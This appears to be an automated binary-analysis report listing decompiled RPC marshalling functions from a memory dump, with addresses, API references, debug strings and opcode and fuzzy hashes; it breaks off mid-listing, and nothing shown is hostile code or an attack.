                                                                                                • Opcode Fuzzy Hash: 553747771ea6898509e07ffe4e5ccd6ad77ea562ce3b16f6eeedf9972c64e5ab
                                                                                                • Instruction Fuzzy Hash: 971184B66041496BDB04CFD8DC51FFB37AE9B89704F048428FE598B2C1D671DA108B71
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA1880, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 51COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 25%
                                                                                                			E6EDA1880(signed int _a4, WCHAR* _a8, signed char* _a12) {

				0x6eda0000("(%p, %p, %p)\n", _a4, _a8, _a12);
				if(( *_a12 & 0x000000ff) == 0x1c) {
					E6EDAD120(0x1c, _a4, _a8, _a12);
					E6EDAD360(0x1c, _a4, _a8, _a12, 1);
					return 0;
				}
				0x6eda0000("invalid format type %x\n",  *_a12 & 0x000000ff);
				__imp__RpcRaiseException(0x6e6);
				return 0;
			}



                                                                                                0x6eda1894
                                                                                                0x6eda18ae
                                                                                                0x6eda18ea
                                                                                                0x6eda1902
                                                                                                0x00000000
                                                                                                0x6eda190a
                                                                                                0x6eda18c5
                                                                                                0x6eda18d2
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA18D2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p)$invalid format type %x
                                                                                                • API String ID: 3997070919-2648126113
                                                                                                • Opcode ID: 160702f0d01921b051dc97ecb2ffb75a155de88f96577a479acbe2d366de5656
                                                                                                • Instruction ID: 3bf657cc60db02cea509c6a2b4215fa8c4e84cc886ec56a965ef34034295688e
                                                                                                • Opcode Fuzzy Hash: 160702f0d01921b051dc97ecb2ffb75a155de88f96577a479acbe2d366de5656
                                                                                                • Instruction Fuzzy Hash: 060144B6600149BFE704DFDCCC51EAB3799AB88744F00851CFA198B281E671EA118771
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDAB030, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 50COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 16%
                                                                                                			E6EDAB030(intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
				intOrPtr _t34;
				void* _t58;

				if( *((intOrPtr*)(_a4 + 4)) + _a12 <  *((intOrPtr*)(_a4 + 4)) ||  *((intOrPtr*)(_a4 + 4)) + _a12 >  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14))) {
					0x6eda0000("buffer overflow - Buffer = %p, BufferEnd = %p, size = %u\n",  *((intOrPtr*)(_a4 + 4)),  *((intOrPtr*)( *_a4 + 8)) +  *((intOrPtr*)(_a4 + 0x14)), _a12);
					_t58 = _t58 + 0x10;
					__imp__RpcRaiseException(0x6f7);
				}
				E6EDB0120( *((intOrPtr*)(_a4 + 4)), _a8, _a12);
				_t34 = _a4;
				 *((intOrPtr*)(_a4 + 4)) =  *((intOrPtr*)(_t34 + 4)) + _a12;
				return _t34;
			}





                                                                                                0x6edab042
                                                                                                0x6edab07e
                                                                                                0x6edab083
                                                                                                0x6edab08b
                                                                                                0x6edab08b
                                                                                                0x6edab0a0
                                                                                                0x6edab0a8
                                                                                                0x6edab0b4
                                                                                                0x6edab0b8

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7,?,?,?,00000001), ref: 6EDAB08B
                                                                                                • _memmove.LIBCMT ref: 6EDAB0A0
                                                                                                Strings
                                                                                                • buffer overflow - Buffer = %p, BufferEnd = %p, size = %u, xrefs: 6EDAB079
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise_memmove
                                                                                                • String ID: buffer overflow - Buffer = %p, BufferEnd = %p, size = %u
                                                                                                • API String ID: 4056999889-1690444158
                                                                                                • Opcode ID: 4310b194f53939a4e2afc6045aabd8b565780225f64911e0ebaa9d1dfde8ad9a
                                                                                                • Instruction ID: b7d0acda6a51a7fd31386a5b122270b626474e0fcf7f0a218ad5ac93f1d49f8d
                                                                                                • Opcode Fuzzy Hash: 4310b194f53939a4e2afc6045aabd8b565780225f64911e0ebaa9d1dfde8ad9a
                                                                                                • Instruction Fuzzy Hash: 1E11C3B8200209AFCB08CF48C994DAABBA6FF88354B19C148FD594B356D731F991CB94
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA17F0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 25%
                                                                                                			E6EDA17F0(signed int _a4, WCHAR* _a8, signed char* _a12) {
				void* _t34;
				void* _t35;

				0x6eda0000("(%p,%p,%p)\n", _a4, _a8, _a12);
				_t35 = _t34 + 0x10;
				if(( *_a12 & 0x000000ff) != 0x1b) {
					0x6eda0000("invalid format = 0x%x\n",  *_a12 & 0x000000ff);
					_t35 = _t35 + 8;
					__imp__RpcRaiseException(0x6f7);
				}
				E6EDAD120(0x1b, _a4, _a8, _a12);
				E6EDAD360(0x1b, _a4, _a8, _a12, 1);
				return 0;
			}





                                                                                                0x6eda1804
                                                                                                0x6eda1809
                                                                                                0x6eda181e
                                                                                                0x6eda1835
                                                                                                0x6eda183a
                                                                                                0x6eda1842
                                                                                                0x6eda1842
                                                                                                0x6eda1856
                                                                                                0x6eda186e
                                                                                                0x6eda1879

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA1842
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p,%p,%p)$invalid format = 0x%x
                                                                                                • API String ID: 3997070919-2274322367
                                                                                                • Opcode ID: bbbec2a8effd75e56de21b78aab10167cda2017debbf0370e0614cbcc26dcecf
                                                                                                • Instruction ID: 1a51817db6031431182f8fe089d4f67f6490f08f4c0839cadef3a79706ea4602
                                                                                                • Opcode Fuzzy Hash: bbbec2a8effd75e56de21b78aab10167cda2017debbf0370e0614cbcc26dcecf
                                                                                                • Instruction Fuzzy Hash: 150152B6600149ABE704DFDCDC51EAB37ADAB49744F008418FA198B281E671EA108BB1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA5410, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 49COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 25%
                                                                                                			E6EDA5410(int _a4, WCHAR* _a8, signed char* _a12) {
				signed char* _t21;

				0x6eda0000("(%p, %p, %p)\n", _a4, _a8, _a12);
				if(( *_a12 & 0x000000ff) == 0x1c) {
					E6EDACC40(0x1c, _a4, _a8, _a12);
					return E6EDACE70(0x1c, _a4, _a8, _a12, 1);
				}
				_t21 = _a12;
				0x6eda0000("invalid format type %x\n",  *_t21 & 0x000000ff);
				__imp__RpcRaiseException(0x6e6);
				return _t21;
			}




                                                                                                0x6eda5424
                                                                                                0x6eda543e
                                                                                                0x6eda5478
                                                                                                0x00000000
                                                                                                0x6eda5495
                                                                                                0x6eda5448
                                                                                                0x6eda5455
                                                                                                0x6eda5462
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA5462
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p, %p)$invalid format type %x
                                                                                                • API String ID: 3997070919-2648126113
                                                                                                • Opcode ID: 31f4a908f2a2a8291bbb409f94acd3e82d04141e5b2196721d99baa648b4f0d2
                                                                                                • Instruction ID: 4ad5e91062956ad6dd3d44980bbd9f10184ae24af0664e4fee20b749f4aab14a
                                                                                                • Opcode Fuzzy Hash: 31f4a908f2a2a8291bbb409f94acd3e82d04141e5b2196721d99baa648b4f0d2
                                                                                                • Instruction Fuzzy Hash: 620152B6640145BFEB04DFDDDC51EAB376DAB49705F048418FA198F281E671EA1087B1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA5380, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 48COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 25%
                                                                                                			E6EDA5380(int _a4, WCHAR* _a8, signed char* _a12) {
				void* _t33;
				void* _t34;

				0x6eda0000("(%p,%p,%p)\n", _a4, _a8, _a12);
				_t34 = _t33 + 0x10;
				if(( *_a12 & 0x000000ff) != 0x1b) {
					0x6eda0000("invalid format = 0x%x\n",  *_a12 & 0x000000ff);
					_t34 = _t34 + 8;
					__imp__RpcRaiseException(0x6f7);
				}
				E6EDACC40(0x1b, _a4, _a8, _a12);
				return E6EDACE70(0x1b, _a4, _a8, _a12, 1);
			}





                                                                                                0x6eda5394
                                                                                                0x6eda5399
                                                                                                0x6eda53ae
                                                                                                0x6eda53c5
                                                                                                0x6eda53ca
                                                                                                0x6eda53d2
                                                                                                0x6eda53d2
                                                                                                0x6eda53e6
                                                                                                0x6eda5407

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA53D2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p,%p,%p)$invalid format = 0x%x
                                                                                                • API String ID: 3997070919-2274322367
                                                                                                • Opcode ID: 8cb4e7f5c6ab999f47dd7d428398fb9a34f763d951fb3a4f5dbf986d62a0fd60
                                                                                                • Instruction ID: b7fa96ef53d29652e3c2bb21d3e74ad3cced1b7db969df4be2dbbd65d855e938
                                                                                                • Opcode Fuzzy Hash: 8cb4e7f5c6ab999f47dd7d428398fb9a34f763d951fb3a4f5dbf986d62a0fd60
                                                                                                • Instruction Fuzzy Hash: 9A011EB6600149BBE704DFDCDC51EBB77ADAB89744F048418FA198B281E671EA508BB1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA6280, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 47COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 25%
                                                                                                			E6EDA6280(signed int _a4, signed char* _a8) {

				0x6eda0000("(%p, %p)\n", _a4, _a8);
				if(( *_a8 & 0x000000ff) == 0x1c) {
					E6EDAD650(0x1c, _a4, _a8);
					E6EDADE30(0x1c, _a4, _a8, 1);
					return  *((intOrPtr*)(_a4 + 0x18));
				}
				0x6eda0000("invalid format type %x\n",  *_a8 & 0x000000ff);
				__imp__RpcRaiseException(0x6e6);
				return  *((intOrPtr*)(_a4 + 0x18));
			}



                                                                                                0x6eda6290
                                                                                                0x6eda62aa
                                                                                                0x6eda62e6
                                                                                                0x6eda62fa
                                                                                                0x00000000
                                                                                                0x6eda6305
                                                                                                0x6eda62c1
                                                                                                0x6eda62ce
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA62CE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p, %p)$invalid format type %x
                                                                                                • API String ID: 3997070919-285380529
                                                                                                • Opcode ID: 382a076d46354e032349163fc180fb16281b90d9ed4b05e985b8f6bfdf7a499b
                                                                                                • Instruction ID: 611148225bbc2a862ff201ee4ca910dece4dc55dc93deb667e6311c1e3ba4a6b
                                                                                                • Opcode Fuzzy Hash: 382a076d46354e032349163fc180fb16281b90d9ed4b05e985b8f6bfdf7a499b
                                                                                                • Instruction Fuzzy Hash: CC015E75640108ABEB04DF9CD851EEE376ADB99754F00C014FE588F381E671EA418BA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA6490, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 25%
                                                                                                			E6EDA6490(signed int _a4, signed char* _a8) {

				0x6eda0000("(%p,%p)\n", _a4, _a8);
				if(( *_a8 & 0x000000ff) == 0x21) {
					E6EDAD650(0x21, _a4, _a8);
					E6EDADE30(0x21, _a4, _a8, 1);
					return  *((intOrPtr*)(_a4 + 0x18));
				}
				0x6eda0000("invalid format type %x\n",  *_a8 & 0x000000ff);
				__imp__RpcRaiseException(0x6e6);
				return 0;
			}



                                                                                                0x6eda64a0
                                                                                                0x6eda64ba
                                                                                                0x6eda64f2
                                                                                                0x6eda6506
                                                                                                0x00000000
                                                                                                0x6eda6511
                                                                                                0x6eda64d1
                                                                                                0x6eda64de
                                                                                                0x00000000

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA64DE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p,%p)$invalid format type %x
                                                                                                • API String ID: 3997070919-2571520743
                                                                                                • Opcode ID: cfa5eee78bd3168616b5ef954077adcba6f38037bbb343ced54ac56bc024fc8c
                                                                                                • Instruction ID: f266ff4db73936569c457debf89fd785ea5c08a615fcba709417f40ead1f8f71
                                                                                                • Opcode Fuzzy Hash: cfa5eee78bd3168616b5ef954077adcba6f38037bbb343ced54ac56bc024fc8c
                                                                                                • Instruction Fuzzy Hash: 54017C75A00104BFD704DFD8D851EEA376AAB99345F00C014FE188F282E671EA818BB1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA49D0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 44COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA4A13
                                                                                                • NDRCContextUnmarshall.RPCRT4(?,?,?,?), ref: 6EDA4A31
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ContextExceptionRaiseUnmarshall
                                                                                                • String ID: (%p, %p, %p)
                                                                                                • API String ID: 3324431081-3304478213
                                                                                                • Opcode ID: 889f1e18df30c9a4746532064e461242bc8349853658cc08e6a224d794c06248
                                                                                                • Instruction ID: 55931839bc5d84f40f87888b637d8aaf19b7b5bfacfcb8dda422fd271d73507d
                                                                                                • Opcode Fuzzy Hash: 889f1e18df30c9a4746532064e461242bc8349853658cc08e6a224d794c06248
                                                                                                • Instruction Fuzzy Hash: 6F0100B5200104EFDB04CF98C890E5A7BAAAF88758B14C108FA499B386D731F951CBA4
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA61F0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 44COMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 25%
                                                                                                			E6EDA61F0(signed int _a4, signed char* _a8) {
				void* _t31;
				void* _t32;

				0x6eda0000("(%p,%p)\n", _a4, _a8);
				_t32 = _t31 + 0xc;
				if(( *_a8 & 0x000000ff) != 0x1b) {
					0x6eda0000("invalid format = 0x%x\n",  *_a8 & 0x000000ff);
					_t32 = _t32 + 8;
					__imp__RpcRaiseException(0x6f7);
				}
				E6EDAD650(0x1b, _a4, _a8);
				E6EDADE30(0x1b, _a4, _a8, 1);
				return  *((intOrPtr*)(_a4 + 0x18));
			}





                                                                                                0x6eda6200
                                                                                                0x6eda6205
                                                                                                0x6eda621a
                                                                                                0x6eda6231
                                                                                                0x6eda6236
                                                                                                0x6eda623e
                                                                                                0x6eda623e
                                                                                                0x6eda624e
                                                                                                0x6eda6262
                                                                                                0x6eda6271

                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA623E
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p,%p)$invalid format = 0x%x
                                                                                                • API String ID: 3997070919-4147536467
                                                                                                • Opcode ID: d48065e3b410e875e423116625b53dfc3fc8123af1783d5b2a8b66cbf8d3459d
                                                                                                • Instruction ID: ea670f6c67ec70fe4c4f26ea8ba2bcc8ad7890d7a15ea9fb6d90d2d8a3f8bd3e
                                                                                                • Opcode Fuzzy Hash: d48065e3b410e875e423116625b53dfc3fc8123af1783d5b2a8b66cbf8d3459d
                                                                                                • Instruction Fuzzy Hash: 24018F75600008BBEB04DFD8D841EEA376ADB88344F00C029FE198F281E671EA418BA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA8990, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 43COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA89DE
                                                                                                Strings
                                                                                                • pStubMsg %p, pMemory %p, type 0x%02x, xrefs: 6EDA89AB
                                                                                                • invalid format type %x, xrefs: 6EDA89CC
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: invalid format type %x$pStubMsg %p, pMemory %p, type 0x%02x
                                                                                                • API String ID: 3997070919-1092843490
                                                                                                • Opcode ID: ef84473e9f903c8bec1a6b6bf8d90a70640414a96ff17251187d6e33eaedc7c9
                                                                                                • Instruction ID: 8179aea6e8dac38653dfc61b79a411115735419ddfc12c67041db35b78bfedd6
                                                                                                • Opcode Fuzzy Hash: ef84473e9f903c8bec1a6b6bf8d90a70640414a96ff17251187d6e33eaedc7c9
                                                                                                • Instruction Fuzzy Hash: 4501A7B5908388BFC740DFE8C850DAE7FB99F9A245F048498F9999F241E6319714CB71
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA8A10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 41COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA8A5E
                                                                                                Strings
                                                                                                • pStubMsg %p, pMemory %p, type 0x%02x, xrefs: 6EDA8A2B
                                                                                                • invalid format type %x, xrefs: 6EDA8A4C
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: invalid format type %x$pStubMsg %p, pMemory %p, type 0x%02x
                                                                                                • API String ID: 3997070919-1092843490
                                                                                                • Opcode ID: f1437e807f4434eb65123670a24cfe1426587f750c67dbd9b856edc4f59aaf67
                                                                                                • Instruction ID: c7f1af56a7dd2fb722d0cc9aa1f461e09f33473cc1d708b753e2f39406a07d34
                                                                                                • Opcode Fuzzy Hash: f1437e807f4434eb65123670a24cfe1426587f750c67dbd9b856edc4f59aaf67
                                                                                                • Instruction Fuzzy Hash: 7801A7B5904288AFC740CFE9C854EAE7FB99F89241F00C488FD558B341E631A724CB71
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA6DB0, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 40COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006E6), ref: 6EDA6E02
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p,%p,%p)$invalid format type %x
                                                                                                • API String ID: 3997070919-814374321
                                                                                                • Opcode ID: 2ad4d22c3dcb19a526ec0c82f6d672a68cbfec5ad99033f152df0fd1ec1c7114
                                                                                                • Instruction ID: 5fb1062c2713ac955cc571fa3045e690a8b1471580ceda78a69e28f85a3b4134
                                                                                                • Opcode Fuzzy Hash: 2ad4d22c3dcb19a526ec0c82f6d672a68cbfec5ad99033f152df0fd1ec1c7114
                                                                                                • Instruction Fuzzy Hash: DD0181B5640145ABE704CFDCCC51FAF376DAB48700F008418FA158F281E671EA5087B2
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6EDA6D30, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 39COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • RpcRaiseException.RPCRT4(000006F7), ref: 6EDA6D82
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.678018439.000000006EDA1000.00000020.00020000.sdmp, Offset: 6EDA0000, based on PE: true
                                                                                                • Associated: 00000001.00000002.677990904.000000006EDA0000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678067581.000000006EDBB000.00000002.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678096032.000000006EDC2000.00000040.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678111610.000000006EDC4000.00000008.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678121797.000000006EDC6000.00000004.00020000.sdmp Download File
                                                                                                • Associated: 00000001.00000002.678134120.000000006EDC9000.00000002.00020000.sdmp Download File
                                                                                                Similarity
                                                                                                • API ID: ExceptionRaise
                                                                                                • String ID: (%p,%p,%p)$invalid format = 0x%x
                                                                                                • API String ID: 3997070919-2274322367
                                                                                                • Opcode ID: 7e254487deaec9efa6a3ad592be75035e80c793dc607b113ef645581cbecb3ef
